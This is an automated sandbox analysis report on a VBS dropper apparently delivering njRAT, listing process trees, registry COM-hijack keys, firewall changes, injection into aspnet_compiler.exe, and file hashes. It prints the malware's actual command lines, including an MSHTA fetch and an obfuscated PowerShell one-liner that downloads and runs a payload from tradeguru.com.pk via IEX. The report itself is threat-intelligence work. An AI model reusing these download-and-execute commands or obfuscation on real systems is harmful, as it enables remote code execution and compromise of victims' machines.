Analysis
-
max time kernel
135s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 18:31
Static task
static1
Behavioral task
behavioral1
Sample
DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource
win10v2004-20220721-en
General
-
Target
DWRNHNKWSJEHWYPNYOGGOP.vbs
-
Size
1KB
-
MD5
43f89bd927a7e80c8240c61617dee7bf
-
SHA1
6a8ab5c11c1afd276cf5dbb7b125cff26080459f
-
SHA256
f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a
-
SHA512
f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4
Malware Config
Extracted
https://tradeguru.com.pk/enc2.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXEPOWERSHELL.exePOWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4648 4532 MSHTA.EXE Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4624 4532 POWERSHELL.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4168 4532 POWERSHELL.exe -
Blocklisted process makes network request 3 IoCs
Processes:
MSHTA.EXEPOWERSHELL.exeflow pid process 5 4648 MSHTA.EXE 16 4648 MSHTA.EXE 26 4624 POWERSHELL.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3568 set thread context of 1272 3568 powershell.exe aspnet_compiler.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exepid process 4624 POWERSHELL.exe 4624 POWERSHELL.exe 1808 powershell.exe 1808 powershell.exe 4168 POWERSHELL.exe 4168 POWERSHELL.exe 3568 powershell.exe 3568 powershell.exe 3568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 4624 POWERSHELL.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 4168 POWERSHELL.exe Token: SeIncreaseQuotaPrivilege 1808 powershell.exe Token: SeSecurityPrivilege 1808 powershell.exe Token: SeTakeOwnershipPrivilege 1808 powershell.exe Token: SeLoadDriverPrivilege 1808 powershell.exe Token: SeSystemProfilePrivilege 1808 powershell.exe Token: SeSystemtimePrivilege 1808 powershell.exe Token: SeProfSingleProcessPrivilege 1808 powershell.exe Token: SeIncBasePriorityPrivilege 1808 powershell.exe Token: SeCreatePagefilePrivilege 1808 powershell.exe Token: SeBackupPrivilege 1808 powershell.exe Token: SeRestorePrivilege 1808 powershell.exe Token: SeShutdownPrivilege 1808 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeSystemEnvironmentPrivilege 1808 powershell.exe Token: SeRemoteShutdownPrivilege 1808 powershell.exe Token: SeUndockPrivilege 1808 powershell.exe Token: SeManageVolumePrivilege 1808 powershell.exe Token: 33 1808 powershell.exe Token: 34 1808 powershell.exe Token: 35 1808 powershell.exe Token: 36 1808 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeIncreaseQuotaPrivilege 1808 powershell.exe Token: SeSecurityPrivilege 1808 powershell.exe Token: SeTakeOwnershipPrivilege 1808 powershell.exe Token: SeLoadDriverPrivilege 1808 powershell.exe Token: SeSystemProfilePrivilege 1808 powershell.exe Token: SeSystemtimePrivilege 1808 powershell.exe Token: SeProfSingleProcessPrivilege 1808 powershell.exe Token: SeIncBasePriorityPrivilege 1808 powershell.exe Token: SeCreatePagefilePrivilege 1808 powershell.exe Token: SeBackupPrivilege 1808 powershell.exe Token: SeRestorePrivilege 1808 powershell.exe Token: SeShutdownPrivilege 1808 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeSystemEnvironmentPrivilege 1808 powershell.exe Token: SeRemoteShutdownPrivilege 1808 powershell.exe Token: SeUndockPrivilege 1808 powershell.exe Token: SeManageVolumePrivilege 1808 powershell.exe Token: 33 1808 powershell.exe Token: 34 1808 powershell.exe Token: 35 1808 powershell.exe Token: 36 1808 powershell.exe Token: SeIncreaseQuotaPrivilege 1808 powershell.exe Token: SeSecurityPrivilege 1808 powershell.exe Token: SeTakeOwnershipPrivilege 1808 powershell.exe Token: SeLoadDriverPrivilege 1808 powershell.exe Token: SeSystemProfilePrivilege 1808 powershell.exe Token: SeSystemtimePrivilege 1808 powershell.exe Token: SeProfSingleProcessPrivilege 1808 powershell.exe Token: SeIncBasePriorityPrivilege 1808 powershell.exe Token: SeCreatePagefilePrivilege 1808 powershell.exe Token: SeBackupPrivilege 1808 powershell.exe Token: SeRestorePrivilege 1808 powershell.exe Token: SeShutdownPrivilege 1808 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeSystemEnvironmentPrivilege 1808 powershell.exe Token: SeRemoteShutdownPrivilege 1808 powershell.exe Token: SeUndockPrivilege 1808 powershell.exe Token: SeManageVolumePrivilege 1808 powershell.exe Token: 33 1808 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 4624 wrote to memory of 1808 4624 POWERSHELL.exe powershell.exe PID 4624 wrote to memory of 1808 4624 POWERSHELL.exe powershell.exe PID 1808 wrote to memory of 632 1808 powershell.exe WScript.exe PID 1808 wrote to memory of 632 1808 powershell.exe WScript.exe PID 4168 wrote to memory of 1436 4168 POWERSHELL.exe cmd.exe PID 4168 wrote to memory of 1436 4168 POWERSHELL.exe cmd.exe PID 1436 wrote to memory of 2960 1436 cmd.exe reg.exe PID 1436 wrote to memory of 2960 1436 cmd.exe reg.exe PID 1436 wrote to memory of 2268 1436 cmd.exe reg.exe PID 1436 wrote to memory of 2268 1436 cmd.exe reg.exe PID 1436 wrote to memory of 1128 1436 cmd.exe cmd.exe PID 1436 wrote to memory of 1128 1436 cmd.exe cmd.exe PID 1128 wrote to memory of 3568 1128 cmd.exe powershell.exe PID 1128 wrote to memory of 3568 1128 cmd.exe powershell.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 3568 wrote to memory of 1272 3568 powershell.exe aspnet_compiler.exe PID 1272 wrote to memory of 4072 1272 aspnet_compiler.exe netsh.exe PID 1272 wrote to memory of 4072 1272 aspnet_compiler.exe netsh.exe PID 1272 wrote to memory of 4072 1272 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"1⤵
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc2.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HKXSZJPBSFUQNNKBRSHJOKP = '[$=^&7<[[=$0$]=)38}@{(4y$=^&7<[[=$0$]=)38}@{(4t{<1[36&1{3\}0_-\[[14<5*<=7#&\!{9^]&374-84*${.IO.$=^&7<[[=$0$]=)38}@{(4t324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-*<=7#&\!{9^]&374-84*${324)23*2469!/&^!\_0=)7{<1[36&1{3\}0_-\[[14<5&2#/!0/&-%5_]<-$4%%-<-d{<1[36&1{3\}0_-\[[14<5324)23*2469!/&^!\_0=)7]'.Replace('$=^&7<[[=$0$]=)38}@{(4','S').Replace('{<1[36&1{3\}0_-\[[14<5','E').Replace('324)23*2469!/&^!\_0=)7','R').Replace('&2#/!0/&-%5_]<-$4%%-<-','A').Replace('*<=7#&\!{9^]&374-84*${','M');$HJZACFIGWCGSTKQFFJFCJWC = ($HKXSZJPBSFUQNNKBRSHJOKP -Join '')|&('I'+'EX');$HRIYRXVTBWQWWOVQDADEHPL = '[69_&(%*}8]8-%$74]$(#_]y69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}5<%_7<=7_#!{{$&]\%{/1)m.N5<%_7<=7_#!{{$&]\%{/1))-({\)@+/1405_2\8*427}.W5<%_7<=7_#!{{$&]\%{/1)bR5<%_7<=7_#!{{$&]\%{/1)qu5<%_7<=7_#!{{$&]\%{/1)69_&(%*}8]8-%$74]$(#_])-({\)@+/1405_2\8*427}]'.Replace('69_&(%*}8]8-%$74]$(#_]','S').Replace('5<%_7<=7_#!{{$&]\%{/1)','E').Replace(')-({\)@+/1405_2\8*427}','T');$HIXNVHEWCKNIFDLFJKSVBHD = ($HRIYRXVTBWQWWOVQDADEHPL -Join '')|&('I'+'EX');$HEPSSGXVTPJJSQLTBOWCTGE = '<[@63<_-53]5@$7[&63/^@r{(51(<04]=6-&01#378}1-a+810347\=@2(3-23#_%166{(51(<04]=6-&01#378}1-'.Replace('<[@63<_-53]5@$7[&63/^@','C').Replace('{(51(<04]=6-&01#378}1-','E').Replace('+810347\=@2(3-23#_%166','T');$HZAUFQYTLDKVFSGTXHYBUGZ = '/(\][54[=_@1]\<9\6\<<{+\88!1}*@<(&9#@692{]_@tR+\88!1}*@<(&9#@692{]_@82]534-04766\1_){4160#pon82]534-04766\1_){4160#+\88!1}*@<(&9#@692{]_@'.Replace('/(\][54[=_@1]\<9\6\<<{','G').Replace('+\88!1}*@<(&9#@692{]_@','E').Replace('82]534-04766\1_){4160#','S');$HRBPYOHOXEOEQFNKBXSNNCQ = 'G!4%@&_9+[%3[)^&%72#813t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@pon$@)(]=][6450_6!7\={3[@!4%@&_9+[%3[)^&%72#813$@)(]=][6450_6!7\={3[@t1(!%9*60#7&21^5^67(%8_!4%@&_9+[%3[)^&%72#813am'.Replace('$@)(]=][6450_6!7\={3[@','S').Replace('!4%@&_9+[%3[)^&%72#813','E').Replace('1(!%9*60#7&21^5^67(%8_','R');$HXLAGAHHFUIJNGIUXVDWXPH = '8}*[+%^=_)@93]23#=&&3[!*%1!+]6_&}@@^]$[+}_*]a+-#8%3}]/+*#^1@+5{[%/[To!*%1!+]6_&}@@^]$[+}_*]n+-#8%3}]/+*#^1@+5{[%/['.Replace('8}*[+%^=_)@93]23#=&&3[','R').Replace('!*%1!+]6_&}@@^]$[+}_*]','E').Replace('+-#8%3}]/+*#^1@+5{[%/[','D');&('I'+'EX')($HJZACFIGWCGSTKQFFJFCJWC::new($HIXNVHEWCKNIFDLFJKSVBHD::$HEPSSGXVTPJJSQLTBOWCTGE('https://tradeguru.com.pk/Server2.txt').$HZAUFQYTLDKVFSGTXHYBUGZ().$HRBPYOHOXEOEQFNKBXSNNCQ()).$HXLAGAHHFUIJNGIUXVDWXPH())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.batFilesize
706B
MD56a90128893777a59d404d46d3e967104
SHA1e2b70c13764f2f61aa8503999670542237046bc4
SHA256b986b6412802dadf97cc3684372614c084a723c25ad5db606c59a7445914b319
SHA5125e8ed2c486b6e0832fb1516d27a63e531355c61155259438f5d2ab220e0545786a76f3633499d721b94d5857e2d0ce2c04b6ae8918bc316ed639b926fdfa794c
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.ps1Filesize
3KB
MD543864d67842266f76a91dc4aee7338c7
SHA1022259ecb6970f6790c329e36b94402ba815b5e0
SHA256c9aee12c943156b698c5f5413fb0a6bbca87d0dec227d972e59dc974ac39decf
SHA51232bb0b67d9ec8064b13a2db93940ed41ce8bc352364a0222dcef7fc6bef98b7c3a579f608fb3cb5d6b81db49a58b736600831f5c40651e058a635f7502d55980
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\EOHXBXCWKDDRNGPNFSIAOH.vbsFilesize
1KB
MD5d6a5f499f7164e0d61a5b8a0b4900fba
SHA1054352e97c7aa7cf0eb3b0cf2ded905fc22a70b9
SHA2565b5e07e5a147d23983fe0adb7fed1c95f76ffe9443bd1394d4a8248a80ad2e44
SHA5122129eb026a406fc52057f1efb9c81e1e8696971ff738093671e1c794c4cb77022bcb8b980c4fc7b1705451e9b86d2cdec87ad35b198d002035cf95dc904ebec2
-
C:\ProgramData\EOHXBXCWKDDRNGPNFSIAOH\JQEIQFWPUTYRZYJCTCTPUB.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50ab03b4ab0ee8273a1eea28cef1ca1e7
SHA18a305ca40e71bd2b04b20c65e28730e3ff3f50b2
SHA256695a48145171a84d61778fe33c410d3195109c7c59a2b1038a1f3ca14c52a3ed
SHA5127347810d3c514b343def26aa42e4b758fc1cdd8a9e57c529de49615b995c8c1dab942d83d432a5ee6e022bbefd020d6b1d920ffa61a9ca2617ff8b67ce3c4f72
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5171c8388c36c7ff24bff6d83366bcbd6
SHA1b457641f8c88a56590921ce729d3111a8964107a
SHA256cbb779c4ad16523953107fa4344f29750fd398216b1769ad9476c43ebe919621
SHA51294889b43df68c6fd761e946a220a7deea68318d9685ffe6c42926e647bbf1f3ef650a1c7dc7e7ffe66e4f02c97a32d4105502c9c8835e14795dcd85088b60e99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
memory/632-137-0x0000000000000000-mapping.dmp
-
memory/1128-144-0x0000000000000000-mapping.dmp
-
memory/1272-158-0x0000000005760000-0x00000000057FC000-memory.dmpFilesize
624KB
-
memory/1272-163-0x0000000005E50000-0x0000000005E5A000-memory.dmpFilesize
40KB
-
memory/1272-159-0x0000000005E60000-0x0000000006404000-memory.dmpFilesize
5.6MB
-
memory/1272-160-0x00000000058B0000-0x0000000005942000-memory.dmpFilesize
584KB
-
memory/1272-162-0x0000000005DB0000-0x0000000005E16000-memory.dmpFilesize
408KB
-
memory/1272-152-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/1272-153-0x000000000040BBBE-mapping.dmp
-
memory/1436-140-0x0000000000000000-mapping.dmp
-
memory/1808-134-0x0000000000000000-mapping.dmp
-
memory/1808-148-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/1808-136-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/2268-143-0x0000000000000000-mapping.dmp
-
memory/2960-142-0x0000000000000000-mapping.dmp
-
memory/3568-155-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/3568-147-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/3568-145-0x0000000000000000-mapping.dmp
-
memory/4072-161-0x0000000000000000-mapping.dmp
-
memory/4168-157-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4168-139-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4624-131-0x000001B54A770000-0x000001B54A792000-memory.dmpFilesize
136KB
-
memory/4624-151-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4624-133-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB
-
memory/4624-132-0x00007FFE84260000-0x00007FFE84D21000-memory.dmpFilesize
10.8MB